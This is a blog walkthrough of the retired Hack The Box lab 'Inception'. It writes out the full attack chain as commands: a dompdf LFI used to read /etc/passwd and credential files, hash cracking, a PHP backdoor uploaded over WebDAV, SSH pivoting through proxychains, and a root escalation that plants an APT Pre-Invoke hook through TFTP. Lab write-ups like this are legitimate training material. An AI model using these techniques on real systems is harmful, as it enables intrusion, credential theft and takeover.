Hello
friends!! Today we are going to solve another challenge “Inception”
which is categories as retired lab presented by Hack the Box for
making online penetration practices. Solving challenges in this lab is not that
much easy, you have to use your entire Penetration testing skills. Let start
and learn how to breach a network and then exploit it for retrieving desired
information.
Level: Hard
Task: find user.txt and root.txt file
on victim’s machine.
Since
these labs are online accessible therefore they have static IP. The IP of Inception
is 10.10.10.67 so let’s start with nmap port enumeration.
nmap -A 10.10.10.67
From
given below image, you can observe we found port 80 and 3128 are open in
victim’s network.
Knowing port 80 was open on victim’s network we preferred to
explore his IP in the browser and the following image get opened as shown
below.
Then we check its source code and found something “dompdf” which could be a directory, so
let’s go through it.
So when we had explored /dompdf in the browser, it put up
some files. I was interested in version so we opened it and found version 0.6.0
After that with help of searchsploit, we got an exploit 33004.txt for dompdf 0.6.0.
In this exploit, you will get an instance for exploiting the
target machine with help of LFI.
Then without wasting time we look for /etc/passwd file with help of the following command:
curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd
But we got an encoded result, therefore, we need to decode
it.
From given below image you can observe that we have
successfully decoded base 64 data and can read first username Cobb.
And after penetrating very deep, we found default.conf file inside apache which holds another base64 value,
now uses given below command for that.
http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf
After decoding above found base64
value, you will get a highlighted path for authuserfile as shown below in the
given image. If you will read the text inside location tag ,
you will realize that it is giving hint for login credential for /webdev_test_inception and more
security details such as authentication type: basic.
Again type the following command:
curl http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd
Hmmmmm!!! One more base64 value, let’s decode this also.
So when we had decoded above based 64 value and found a hash
value for user “webdav_tester” from it. Here we had copied it into a text file
and now going to use john the ripper for cracking this hash.
Type following command for cracking hash value with the
help of /rockyou.txt
john hash
--wordlist=/usr/share/wordlists/rockyou.txt
So
currently we have our username “webdav_tester” and
the password “babygurl69” for
login into / webdev_test_inception
and authentication type is also basic therefore we can use cadaver for uploading backdoor.
Type
following command for uploading php backdoor:
cadaver
http://10.10.10.67/webdav_test_inception
webdav_tester
babygurl69
put /root/Desktop/qsd-php-backdoor.php
While uploading php backdoor
we had tried so many types of php backdoor but among them qsp-php-backdoor.php
was working and it is default location is /usr/share/webshells/php.
Then we open uploaded php shell in the browser and click on
“go to current working directory”.
http://webdav_test_inception/qsd-php-backdoor.php
It brings us into inside /html directory, where we saw wordpress 4.8.3 and opened it.
Then we explore /wp-config.php file and found username
“root” and password “VwPddNh7xMZyDQoByQL4". We also tried to login to
wordpress but it was not active.
Again we came back to the previous page as shown below and
type the following command inside execute shell text filed for identifying all running
services inside the network.
netstat antp
Here we found ssh is
open inside internal network and also observed new interface 192.168.0.10
Since we know port 3128 is open for squid http proxy, so now
open /etc/proxy.conf to add that
inside it as shown below in the image.
Now connect to ssh through proxychains by using below
command and submit password that was found from inside /wp-config.php for user
cobb.
proxychains ssh
cobb@127.0.0.1
Nice!!! It works and we logged in successfully, let’s grab
the user.txt first as shown.
Then for finding root.txt flag, we need privilege
escalation, therefore, type sudo -l
command which will tell you sets permission for user cobb. And you will see
that Cobb has ALL permissions. Then further we execute sudo su and got root access and move for root.txt file.
Dammitttttttt!!!!! It was a bloody trap, not original root
access.
ifconfig tells us IP is 192.168.0.10 and then we ping
thought to ping 192.168.0.1, and the
host was up.
Then with help of the following command, we came to know
port 21, 22 and 53 was opened.
nc -zv 192.168.0.1
1-65535 &> results && cat results | grep succeeded
We successfully login into ftp by using anonymous:
anonymous and run ls command for
looking all directories and files.
Inside /etc we saw three files: passwd, crontab and
tftpd-hpa in /default. We downloaded all three files.
cd /etc
put passwd
put crontab
cd default
put tftpd-hpa
Then read all three file through cat
cat /etc/passwd
cat
/default/tftpd-hpa
cat crontab
Here we saw something very interested that every 5 minutes apt-update command
is running.
Then we generated ssh key by executing following command:
ssh-keygen
Now enter following commands for uploading public key on
192.168.0.1 using TFTP:
cd /root/.ssh
tftp 192.168.0.1
put id_rsa.pub
/root/.ssh/authorized_keys
Since tftp gives all permission to the authorized key
which means anyone can read and write it as result ssh public key get fail due
to incorrect permission, it should 600. Now exit from tftp and change
authorized key permission in the current host machine.
quit
We were not much sure how to change permission through
apt-update command, therefore, we search in Google and luckily found a link
that helps us in generating apt update command for changing authorized key
permission.
echo
'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};'
> rootshell
tftp 192.168.0.1
put rootshell
/etc/apt/apt.conf.d/rootshell
quit
ssh
root@192.168.0.1
Wait for 5 mins and then you will get root access. After
that grab the root.txt flag and Hit the GOAL!!!
0 comments:
Post a Comment